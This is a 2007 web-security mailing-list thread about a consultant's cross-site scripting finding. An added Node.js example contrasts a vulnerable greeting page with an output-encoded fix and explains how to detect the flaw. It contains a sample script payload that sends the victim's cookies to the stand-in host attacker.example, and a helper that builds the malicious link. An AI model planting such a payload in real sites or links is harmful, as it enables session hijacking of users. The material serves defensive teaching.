
Re: [WEB SECURITY] Cross Site Scripting



Here is a decent (if slow) explanation of XSS

http://www.virtualforge.de/vmovie/xss_selling_platform_v1.0.php

I agree with Daniel though, whoever provided that finding should be able to explain it to you. Looks like a cut'n'paste scanner jockey to me.

---
Bill Pennington
VP Services
WhiteHat Security Inc.
http://www.whitehatsec.com

----- Original Message -----
From: "Mad Unix" <madunix@xxxxxxxxx>
To: websecurity@xxxxxxxxxxxxx
Sent: Thursday, September 20, 2007 12:53:11 AM (GMT-0800) America/Los_Angeles
Subject: [WEB SECURITY] Cross Site Scripting


Our security consulting company discovered the following risk on our web server:

Cross Site Scripting 
Risk: High 

Description of Vulnerability 

The Cross-Site Scripting attack is a privacy violation that allows an attacker to acquire a legitimate user's credentials and to impersonate that user when interacting with a specific website. The attack hinges on the fact that the web site contains a script that returns a user's input (usually a parameter value) in an HTML page, without first sanitizing the input. This allows an input consisting of JavaScript code to be executed by the browser when the script returns this input in the response page. As a result, it is possible to form links to the site where one of the parameters consists of malicious JavaScript code. This code will be executed (by a user's browser) in the site context, granting it access to cookies that the user has for the site, and other windows in the site through the user's browser.



-------------- 
Can anyone tell me more about this effect and how to observe and resolve this issue, since it is given as high risk.
Thanks 


-- 
madunix 
madunix@xxxxxxxxx 
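The reflected XSS pattern the consultant's write-up describes, shown as an added example that is not part of the original thread or of any product mentioned in it. It is Node.js code for a hypothetical greeting page: the page, the `name` parameter, the function names and the `attacker.example` host are all assumptions chosen for illustration. It shows the vulnerable template beside the encoded fix, the kind of link an attacker would send, and the check used to observe whether the input comes back verbatim in the response.

```javascript
// Added example, not code from the original thread. A hand-rolled HTML page
// that reflects a request parameter, first unsafely and then with output
// encoding. All names here are illustrative assumptions.

// Constructed sample payload: the "name" parameter as an attacker would craft
// it in a link sent to a victim. If it runs, it sends the victim's cookies for
// this site to attacker.example (a hypothetical host).
const ATTACKER_NAME =
  "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";

// Vulnerable: the parameter value is concatenated straight into the markup,
// so a value containing "<script>" becomes a live script element.
function renderUnsafe(name) {
  return `<html><body><h1>Welcome, ${name}</h1></body></html>`;
}

// The fix is output encoding for the HTML text context: the five characters
// that can close a text node or a quoted attribute are replaced by entities.
// Note this is encoding on output, not "sanitizing" the input on the way in.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: same template, but the untrusted value is encoded before it is
// written into the page. The browser renders it as text, never as markup.
function renderSafe(name) {
  return `<html><body><h1>Welcome, ${escapeHtml(name)}</h1></body></html>`;
}

// Minimal request handler: pull "name" from the query string the way the
// vulnerable server-side script would, then hand it to one of the renderers.
function handleRequest(requestUrl, render) {
  const name = new URL(requestUrl).searchParams.get("name");
  return render(name === null ? "guest" : name);
}

// How to observe the finding: send the payload and check whether the response
// contains it unchanged. A verbatim echo of a "<script>" payload is reflected
// XSS; an encoded echo ("&lt;script&gt;") is not.
function reflectsPayloadVerbatim(responseHtml, payload) {
  return responseHtml.includes(payload);
}

// The link an attacker would distribute: the payload URL-encoded into the
// query string of the legitimate site (example.test is a placeholder host).
function attackerLink() {
  return "http://example.test/greet?name=" + encodeURIComponent(ATTACKER_NAME);
}

// Stand-alone demonstration of both renderers against the same link.
const link = attackerLink();
console.log("vulnerable response:", handleRequest(link, renderUnsafe));
console.log("reflected verbatim? ",
  reflectsPayloadVerbatim(handleRequest(link, renderUnsafe), ATTACKER_NAME));
console.log("fixed response:     ", handleRequest(link, renderSafe));
console.log("reflected verbatim? ",
  reflectsPayloadVerbatim(handleRequest(link, renderSafe), ATTACKER_NAME));
```

Two caveats a practitioner would add to the consultant's text: the encoding above is correct only for a value placed in HTML text content or a quoted attribute; a value written into a JavaScript block, a URL, or a CSS rule needs the encoding for that context instead. And marking the session cookie `HttpOnly` stops this particular payload from reading `document.cookie`, but the injected script still runs in the site's origin and can issue requests as the user, so it is a mitigation rather than the fix.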
